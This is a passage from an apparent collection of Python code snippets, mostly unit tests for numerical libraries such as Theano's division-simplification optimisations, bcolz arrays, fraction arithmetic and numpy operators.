((fx*fv)/fx,[fx,fv],[fxv,fvv],1,'float32')\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float32, row)>)]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert(out_dtype == out.dtype)\r\n assert numpy.allclose(out, val_inputs[1])\r\n topo = f.maker.fgraph.toposort()\r\n print \"ID TOPO\", id, topo, sym_inputs\r\n for r, t in f.maker.fgraph.shape_feature.shape_of.items():\r\n print ' ', r, t\r\n if topo and not(len(topo)==1 and topo[0].op==deep_copy_op):\r\n for node in topo[:-1]:\r\n assert isinstance(node.op, Shape_i)\r\n assert isinstance(topo[-1].op, tensor.Alloc)\r\n\r\n #test x / y / x -> 1 / y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx/dy)/dx,[dx,dy],[dxv,dyv],1,'float64'),\r\n ((fx/fy)/fx,[fx,fy],[fxv,fyv],1,'float32'),\r\n ((dv/dy)/dv,[dv,dy],[dvv,dyv],1,'float64'),\r\n ((fv/fy)/fv,[fv,fy],[fvv,fyv],1,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n\r\n ((dx/dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float64, row)>), Alloc]\r\n ((fx/fv)/fx,[fx,fv],[fxv,fvv],1,'float32'),\r\n #topo:[Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float32, row)>), Alloc]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (1 / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n print topo\r\n elem = [t for t in topo if isinstance(t.op, T.Elemwise)]\r\n assert len(elem) == nb_elemwise\r\n assert isinstance(elem[0].op, (T.Elemwise, ))\r\n assert isinstance(elem[0].op.scalar_op, (\r\n theano.scalar.basic.Inv, theano.scalar.basic.TrueDiv))\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (a / b) * (b / c) * (c / d) -> a / d\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((dx / dy) * (dy / dz) * (dz / dw),[dx,dy,dz,dw],[dxv,dyv,dzv,dwv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fw),[fx,fy,fz,fw],[fxv,fyv,fzv,fwv],'float32'),\r\n ((dv / dy) * (dy / dz) * (dz / dw),[dv,dy,dz,dw],[dvv,dyv,dzv,dwv],'float64'),\r\n ((fv / fy) * (fy / fz) * (fz / fw),[fv,fy,fz,fw],[fvv,fyv,fzv,fwv],'float32'),\r\n ((dx / dv) * (dv / dz) * (dz / dw),[dx,dv,dz,dw],[dxv,dvv,dzv,dwv],'float64'),\r\n ((fx / fv) * (fv / fz) * (fz / fw),[fx,fv,fz,fw],[fxv,fvv,fzv,fwv],'float32'),\r\n ((dx / dy) * (dy / dv) * (dv / dw),[dx,dy,dv,dw],[dxv,dyv,dvv,dwv],'float64'),\r\n ((fx / fy) * (fy / fv) * (fv / fw),[fx,fy,fv,fw],[fxv,fyv,fvv,fwv],'float32'),\r\n ((dx / dy) * (dy / dz) * (dz / dv),[dx,dy,dz,dv],[dxv,dyv,dzv,dvv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fv),[fx,fy,fz,fv],[fxv,fyv,fzv,fvv],'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (val_inputs[0] / val_inputs[3]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[0].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (2.0 * x) / (4.0 * y) -> (0.5 * x) / y\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (((2.0*dx)/(4.0*dy)),[dx,dy],[dxv,dyv],'float64'),\r\n (((2.0*fx)/(4.0*fy)),[fx,fy],[fxv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dv)/(4.0*dy)),[dv,dy],[dvv,dyv],'float64'),\r\n (((2.0*fv)/(4.0*fy)),[fv,fy],[fvv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dx)/(4.0*dv)),[dx,dv],[dxv,dvv],'float64'),\r\n (((2.0*fx)/(4.0*fv)),[fx,fv],[fxv,fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (0.5 *\r\n val_inputs[0] / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.Mul)\r\n assert len(topo[0].inputs) == 2\r\n assert isinstance(topo[1].op, (T.Elemwise, ))\r\n assert isinstance(topo[1].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[1].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test 2 * x / 2 -> x\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2*dx)/2,[dx],[dxv],'float64'),\r\n ((2*fx)/2,[fx],[fxv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2*dv)/2,[dv],[dvv],'float64'),\r\n ((2*fv)/2,[fv],[fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, val_inputs[0])\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n topo[0].op == deep_copy_op\r\n assert(out_dtype == out.dtype)\r\n\r\n #test x / abs(x) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (dx/abs(dx),[dx],[0.5-dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.5-fxv], 'float32'),\r\n (dx/abs(dx),[dx],[0.1*dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.1*fxv], 'float32'),\r\n (dv/abs(dv),[dv],[0.5-dvv],'float64'),\r\n (fv/abs(fv),[fv],[0.5-fvv], 'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]))\r\n assert(out_dtype == out.dtype)\r\n assert len(f.maker.fgraph.toposort()) == 1\r\n\r\n #test (2*x) / (3*abs(x)) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.5 - dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.5 - fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.1 * dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.1 * fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dv) / (3 * abs(dv)), [dv], [0.5 - dvv], 'float64'),\r\n ((2 * fv) / (3 * abs(fv)), [fv], [0.5 - fvv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n topo = f.maker.fgraph.toposort()\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]) * 2 / 3)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def testmul_Y_X ( self ):\r\n\t\tr = re.compile ( 'frac' )\r\n\t\tfor fracTupX, fracTupY, dictAdd, dictSub, dictMul, dictDiv in self.knownArithResultValues:\r\n\t\t\tfracX = eval ( r.sub ( 'frac.frac', fracTupX ) )\r\n\t\t\tfracY = eval ( r.sub ( 'frac.frac', fracTupY ) )\r\n\t\t\tmul_fracY_fracX = fracY * fracX\r\n\t\t\tself.assertEqual ( mul_fracY_fracX.toString ().split ()[0], dictMul ['Y*X'] )", "def test01(self):\n a = np.arange(1e5)\n sa = a.sum(dtype='i8')\n ac = bcolz.carray(a)\n sac = ac.sum(dtype='i8')\n # print \"numpy sum-->\", sa\n # print \"carray sum-->\", sac\n self.assertTrue(sa.dtype == sac.dtype,\n \"sum() is not working correctly.\")\n self.assertTrue(sa == sac, \"sum() is not working correctly.\")", "def test07(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = c[\"a + 2 * d - 3 > 0\"]\n nr = a[(a + 2 * b - 3) > 0]\n # print \"ca[expr] ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"carray[expr] does not work correctly\")", "def test_binops(self):", "def non_vectorized_loops(self, data):\n\n non_vectorized = np.zeros(data.shape)\n for row in range(data.shape[0]):\n for col in range(data.shape[1]):\n non_vectorized[row][col] = (data[row][col] * data[row][col] +\n data[row][col])\n return non_vectorized", "def test_elemwise_multiple_inputs_optimisation2(self):\r\n raise SkipTest(\"Current implementation of Canonizer does not \"\r\n \"implement all cases. Skip the corresponding test.\")\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx + dy + dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx * dy * dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * (fx + fy + fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (dx * dy * (dx + dy + dz), (dx, dy, dz), (dxv, dyv,\r\n dzv), 2, 'float64'),\r\n (fx * fy * (fx + fy + dz), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type add\r\n (dz * fy * (fx + fy), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 * fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (fx * fy * 2 * (fx+fy+fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (fx*fy*(2+fx+fy+fz), (fx, fy, fz), (fxv, fyv, fzv), 2, 'float32'),\r\n (fx*fy*2*(fx+fy+fz+2), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n\r\n #check with broadcast of row\r\n (fx+fy+fz+fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fz*fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv+fx+fy+fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv*fx*fy*fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fv*(fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*fv*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 2, 'float32'),\r\n (dx+dy+dz+dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dz*dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv+dx+dy+dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv*dx*dy*dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dv*(dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*dv*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 2, 'float64'),\r\n\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding('local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)", "def test_doubles(self):\n self.assertEqual(doubles(self.TestData), 3)\n self.assertEqual(doubles(array([0,3,4])), 0)\n self.assertEqual(doubles(array([2])), 1)", "def test_expression(x, y, z):\n return x * y + y / z", "def test_adding(self):\n adder = Adder()\n\n for i in range(-10, 10):\n for j in range(-10, 10):\n self.assertEqual(i + j, adder.calc(j, i))", "def test_analytical_vs_numerical():\n pass", "def test_equal6():\n x = randtool(\"float\", -10, 10, [3, 3, 3, 1])\n y = randtool(\"float\", -10, 10, [3, 3, 1])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def testmul_X_Y ( self ):\r\n\t\tr = re.compile ( 'frac' )\r\n\t\tfor fracTupX, fracTupY, dictAdd, dictSub, dictMul, dictDiv in self.knownArithResultValues:\r\n\t\t\tfracX = eval ( r.sub ( 'frac.frac', fracTupX ) )\r\n\t\t\tfracY = eval ( r.sub ( 'frac.frac', fracTupY ) )\r\n\t\t\tmul_fracX_fracY = fracX * fracY\r\n\t\t\tself.assertEqual ( mul_fracX_fracY.toString ().split ()[0], dictMul ['X*Y'] )", "def test_mul(x, y):\n\n assert mul(x, y) == mul(y, x)", "def test_scalar(self):\r\n x = scalar('x')\r\n p = ptp(x)\r\n f = theano.function([x], p)\r\n\r\n y = numpy.asarray(rand() * 2000 - 1000, dtype=config.floatX)\r\n result = f(y)\r\n numpyResult = numpy.ptp(y)\r\n\r\n self.assertTrue(numpy.array_equal(result, numpyResult))", "def test_xy(self):\n x = np.array([[1,3], [2,8], [1,3]])\n y = np.array([1,1,-1])\n lro = LogisticRegressionOptimiser(x,y)\n expected = np.array([[1,3], [2,8], [-1,-3]])\n for i in 0,1,2:\n for j in 0,1:\n self.assertEqual(lro.xy[i][j], expected[i][j])", "def test_basic(self):\n result = Plugin()._add_bounds_to_thresholds_and_probabilities(\n self.threshold_points, self.probabilities_for_cdf, self.bounds_pairing\n )\n self.assertIsInstance(result[0], np.ndarray)\n self.assertIsInstance(result[1], np.ndarray)", "def test_single(self):\n df = self.df.head(1).copy()\n out = compositional_mean(df)\n # Check closure\n self.assertTrue(np.allclose(np.sum(out.values, axis=-1), 1.0))", "def test_2():\n\n n1 = 10\n n2 = 100\n ndim = 3\n\n semi_axes = np.random.random((n1,ndim))\n coords = np.array([sample_ellipsoidal_volume(n2, semi_axes[i]) for i in range(0,n1)])\n\n Is = iterative_inertia_tensors_3D(coords)\n\n assert np.shape(Is)==(n1,ndim,ndim)", "def test_is_unital_isometry_true():\n v_mat = np.array([[1, 0, 0], [0, 1, 0]])\n np.testing.assert_equal(is_unital([v_mat], dim=[3, 2]), True)", "def test_multiple(self):\n df = self.df.copy()\n for renorm in [True, False]:\n with self.subTest(renorm=renorm):\n out = nan_weighted_compositional_mean(df.values, renorm=renorm)\n if renorm:\n self.assertTrue(np.allclose(np.sum(out, axis=-1), 1.0))", "def test_positive_slope(self):\n slopes = []\n for i in range(100):\n neighborhood, pc = create_point_cloud_in_plane_and_neighborhood()\n slopes += list(EigenValueVectorizeFeatureExtractor().extract(pc, neighborhood, None, None, None)[6])\n np.testing.assert_array_less(np.zeros_like(slopes), slopes)", "def test_compute(local_registry, dask_array, numpy_array):\n q = local_registry.Quantity(dask_array, units_)\n\n comps = add_five(local_registry, q)\n res = comps.compute()\n\n assert np.all(res.m == numpy_array)\n assert not dask.is_dask_collection(res)\n assert res.units == units_\n assert q.magnitude is dask_array", "def EvaluatePointDataField(self, *float, **kwargs):\n ...", "def test_sphere(self):\n fun = get_problem('sphere', self.dimension)\n self.assertEqual(fun(self.array), 0.0)", "def test_01_pass(self):\n \n print(arr / x)", "def test_numpy_operator():\n A = np.array([1, 2, -1, 3, 0, 4]).reshape(3, 2)\n B = np.array([-1, -3, 2, 0]).reshape(2, 2)\n numerical = A @ B\n # hand-calculated result:\n analytical = np.array([3, -3, 7, 3, 8, 0]).reshape(3, 2)\n msg = 'Error, there is something wrong with numpy\\'s \"@\" operator'\n assert np.array_equal(numerical, analytical), msg", "def _process(self, data: np.array) -> np.array:\n # pylint: disable=no-member\n return unp.sqrt(data[..., 0] ** 2 + data[..., 1] ** 2) * self.scale", "def test_point_with_zero_value_is_good():\n point = np.array([0, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_apply(Group: Type[jaxlie.MatrixLieGroup]):\n T_w_b = sample_transform(Group)\n p_b = onp.random.randn(Group.space_dim)\n\n if Group.matrix_dim == Group.space_dim:\n assert_arrays_close(\n T_w_b @ p_b,\n T_w_b.apply(p_b),\n T_w_b.as_matrix() @ p_b,\n )\n else:\n # Homogeneous coordinates\n assert Group.matrix_dim == Group.space_dim + 1\n assert_arrays_close(\n T_w_b @ p_b,\n T_w_b.apply(p_b),\n (T_w_b.as_matrix() @ onp.append(p_b, 1.0))[:-1],\n )", "def test_step3(self):\n fun = get_problem('step3', self.dimension)\n self.assertEqual(fun(self.array), 0.0)", "def test06(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = bcolz.eval(\"d - 3\")\n nr = b - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test(self, x, y, z):\n return self.a*x + self.b*y + self.c*z + self.d", "def test02(self):\n a = np.arange(self.N, dtype='uint64')\n b = bcolz.carray(a, rootdir=self.rootdir)\n c = iter(b.view())\n u = c.iter(3)\n w = b.iter(2)\n self.assertEqual(sum(a[3:]), sum(u))\n self.assertEqual(sum(a[2:]), sum(w))", "def test_mixeddiv():\r\n i = iscalar()\r\n d = dscalar()\r\n assert 0 == function([i, d], d * (i // (i + 1)))(3, 1.0)", "def np_elementwise(mat1, mat2):\n suma = mat1 + mat2\n resta = mat1 - mat2\n multi = mat1 * mat2\n div = mat1 / mat2\n return(suma, resta, multi, div)", "def test_exner_function():\n pressure = np.array([900., 500., 300., 100.]) * units.mbar\n truth = np.array([0.97034558, 0.82033536, 0.70893444, 0.51794747]) * units.dimensionless\n assert_array_almost_equal(exner_function(pressure), truth, 5)", "def test_fonction_p():\n Func = [[7729.018255678793, 140.153834155207, 68.77595919655846, 31.62018118184545, 18.030431610812485,\n 11.480451328936848, 8.854799040173322, 5.891748736768329, 4.107058029460621, 3.525987646397012,\n 2.6501857762543453, 1.9939336429398156, 1.796115967192535, 1.3439730213174272, 1.0573728322694307,\n 0.9370165183504918, 0.6862225806758537, 0.58629480789044, 0.46467717773394074, 0.4351295050299971,\n 0.31030829231196316, 0.18283441858118177, 0.2508750473787763, 0.12603102215466033, 0.1403733845624147,\n 0.208944572364959, 0.05937056209629393, 0.06406561737973851, 0.02549828229037716, 0.044190126138167286,\n 0.12220850634047802, 0.07250107250107221, 0.008166145780824684, 1.0000000000000118, 0.0016025641025641038,\n 0.00644122383252819, 0.0016025641025641038],\n [0.9610949812702193, 0.4109019899274278, 0.3089377623397382, 0.23495840772645324, 0.20677330100735603,\n 0.19949331148184576, 0.19889217797273162, 0.1983236356606282, 0.20419249563878353, 0.22439671222315674,\n 0.2468001421725052, 0.26934377202851223, 0.3026764978536294, 0.318102154625913, 0.36021755759452945,\n 0.3948630408193794, 0.4151320064818989, 0.4874842761804363, 0.5224160769563155, 0.5581950422944579,\n 0.5694688385000937, 0.55031751183993, 0.6849362225850419, 0.6075803939330335, 0.7350416126522452,\n 0.8427100469155232, 0.6733603675051251, 0.7902933382920369, 0.6836315434546335, 0.8276834938319588,\n 0.9487611479434883, 0.9330768568229448, 0.8193885540523317, 0.997, 0.6670224119530418, 0.8010253123998721,\n 0.6670224119530418]]\n Func2 = [[351.7858724605074, 86.17819599440456, 40.60817807215555, 22.41370879569776, 13.71370737429577, 9.380805367958237, 6.500771030437166, 5.1934818237317595, 3.8672723604183825, 2.9429262287072286, 2.2293044011542276, 1.7413726101499962, 1.4110020679698105, 1.145285045596285, 0.8493079536648233, 0.7075504964039413, 0.5314726701362551, 0.3946934984396482, 0.35765493303260854, 0.26720947446336063, 0.20483675723548622, 0.16768018253752273, 0.1348248093028533, 0.09131928959311625, 0.06352807714123655, 0.10443083847008712, 0.08486764614717036, 0.07948616458565717, 0.034928848641655796, 0.01957585644371944, 0.0101010101010101, 0.0060868252930227846, 0.003034178389628626, 1.0000000000000095, 0.00040016006402561054, 0.999999999998485, 1.0000000000005178], [0.4014557102478067, 0.19662718856027814, 0.14714271380376454, 0.12376760998544561, 0.11465015678691455, 0.11701257764627322, 0.11971607647950641, 0.12500413021169918, 0.13585072294949355, 0.15396764607614966, 0.1688776087223454, 0.19466317245480091, 0.22196728054180964, 0.25356761298043673, 0.2838683431502283, 0.32214826256665563, 0.3474420903976237, 0.38101744922057085, 0.4472615852893438, 0.4838915064306636, 0.5092442536661715, 0.5393723754562065, 0.6281883708635211, 0.6075021365541242, 0.5864414731409806, 0.8093479024729197, 0.8515064760519562, 0.8942467588311623, 0.7951232441028355, 0.8030838419531001, 0.8347245409015025, 0.7345183562814673, 0.5796857049505159, 0.9992, 0.500100020004001, 0.9997999999999997, 0.9996000000000002]]\n Func3 = [[0, 587.8353916144741, 122.51606563339197, 43.412900839437754, 23.57555460166956, 15.269810446375592,\n 10.302086288261853, 6.559749680166944, 4.733027276883256, 3.5899442373476638, 2.6188091438741785,\n 1.8973511635960179, 1.59962405851026, 1.1900558241207209, 0.9154742469037501, 0.6663774582713599,\n 0.5510310065149937, 0.3962213545720932, 0.34948402621422503, 0.25056075858741617, 0.2104583602324079,\n 0.14271205720517338, 0.14355391510677562, 0.09448580768732265, 0.09563164108618655, 0.05255180659992084,\n 0.05056730634542649, 0.04830593760483059, 0.017362995116657634, 0.018563316442158327, 0.008064516129032258,\n 1.000000000000367, 0.007556675062972293],\n [0, 0.3286716474211523, 0.13242848819742412, 0.08446949128973799, 0.06942310179309806, 0.06710098910557027,\n 0.0672674712138261, 0.07277714425838515, 0.07860653317204705, 0.08731142910806171, 0.10727105079265914,\n 0.11444337732064816, 0.1388584129446931, 0.1545716580456971, 0.1909675139048617, 0.2078287621915297,\n 0.24481225152845482, 0.2809639446229486, 0.3427375708843379, 0.3563349568749672, 0.44658806716684524,\n 0.4323139797237823, 0.5209648901237686, 0.5384242118067787, 0.6800151114469211, 0.6244881568587771,\n 0.6892348767357834, 0.8342138924420222, 0.7306736811340057, 0.7746555651829621, 0.6684491978609626,\n 0.9988000000000005, 0.7158196134574087]]\n Func4 = [[15748.752858254895, 191.911645065407, 73.47842499410935, 30.41633464294201, 19.98626405383976, 11.452154438755791, 7.133577668465118, 5.558028573739012, 3.9221979491511965, 2.883103216560325, 2.134843944573437, 1.672594713096574, 1.2840603701894708, 0.9760043686353028, 0.7383287083076139, 0.5201345636008389, 0.3922546743466271, 0.3075443182363077, 0.2190805647347894, 0.20447301461609166, 0.13718384831088948, 0.10116884193975774, 0.06605172314636748, 0.05724132569770158, 0.05521472392638043, 0.028443817583450853, 0.030927835051546386, 0.020842194810718865, 0.014610389610389598, 0.008522010992889928, 0.999999999998485, 0.004924128228318766, 0.9999999999999153], [0.8339118479799609, 0.09465261480352483, 0.05645445767221664, 0.04042946161369488, 0.039816125266879804, 0.038808660214436394, 0.04108030531513686, 0.04722150007344185, 0.05756881734809522, 0.06174501095337855, 0.07754371601798399, 0.08835218320247393, 0.11277873469258441, 0.14265723594157298, 0.1591593134391955, 0.18294405416467058, 0.20022650693883753, 0.25880068050710453, 0.28508276563948803, 0.38530886060602676, 0.3827846845148159, 0.3989797846053703, 0.4321293982608086, 0.549123155471954, 0.6479481641468685, 0.6177554137838079, 0.7204610951008645, 0.7485830392471395, 0.8589097572148419, 0.7662293265433628, 0.9997999999999997, 0.7786256145580744, 0.9994]]\n Func5 = [[6025.007118984573, 201.67078346958766, 61.164046929888165, 28.570275345356297, 16.42844389234335, 10.118865208041463, 6.5569441993908315, 5.115524806237155, 3.670230880870961, 2.578942628606752, 1.9336145754313054, 1.3128869676600932, 1.0509490349325865, 0.8260606265098674, 0.6192337836269376, 0.39548178329078904, 0.3125342768364706, 0.2535171070520563, 0.17950996366785027, 0.1589593169850413, 0.08776166654828464, 0.07186902085373958, 0.05087852147014008, 0.04031209362808843, 0.015025041736227053, 0.017452299442196745, 0.017452299442196745], [0.4900449307377233, 0.052013394197577424, 0.02763077179222995, 0.022073148401405642, 0.021551468349526978, 0.022874943012867084, 0.025129502524592704, 0.0290677734501479, 0.03586807797479691, 0.04200099407612618, 0.05395970879783885, 0.06222885447396381, 0.08011656818055503, 0.10740529383718123, 0.13349486346877767, 0.14548961984802525, 0.16651317027639345, 0.2157377384182918, 0.2536490552393858, 0.3281846996863911, 0.3205769005384313, 0.37653580728960656, 0.42583822467919963, 0.5652911249293386, 0.5004170141784822, 0.6177302303447393, 0.6177302303447393]]\n Func6 = [[np.mean([4447.600676225763, 4028.6041733343945]), 1122.3591601299543, np.mean([566.3324626056967, 560.7330884421851]), 330.62666503822817, 210.43180030971985, 149.0424349106643, 82.3987852348437, 44.547601156494196, 26.426565843449865, 17.824560051495858, 13.783607579356286, 10.40131640361244, 7.455414078577158, 5.499251804904008, 4.302343361171181, 3.539763892078505, 2.784540963982787, 2.2236920038741386, 1.7559944701404429, 1.4584556538378022, 1.200557790786275, 1.0699270271332681, 0.8634699222550425, 0.7434193327535079, 0.5714709844638692, 0.4396553281521431, 0.3818399186003246, 0.32953426555502685, 0.24102244704033102, 0.22355346426540507, 0.15212505517750333, 0.16001860110466576, 0.10928264810439764], [np.mean([0.2617607830185082, 0.24308742821120072]), 0.0927423079289474, 0.05568821342607846, 0.03793131631871315, 0.0278257161673426, 0.022656568305311583, 0.016435055935377363, 0.013349794613250844, 0.011828502037667653, 0.011907722737912936, 0.011906786143346124, 0.01350556077146206, 0.014414705674904129, 0.015921318603495407, 0.018673975709110842, 0.02270468991422641, 0.02309589946853888, 0.027514993109446845, 0.032185252317963355, 0.039533712217873974, 0.04836171488037051, 0.05571282912235797, 0.0662400500529835, 0.0842953982688298, 0.09463525780280219, 0.11078755407852524, 0.12333175657275465, 0.1523270728384864, 0.1633804430013571, 0.2132018494926845, 0.20858345530936606, 0.26749188764633536, 0.28116189267776115]]\n index = np.linspace(0.5, 11.3, 37)\n print(index)\n index3 = 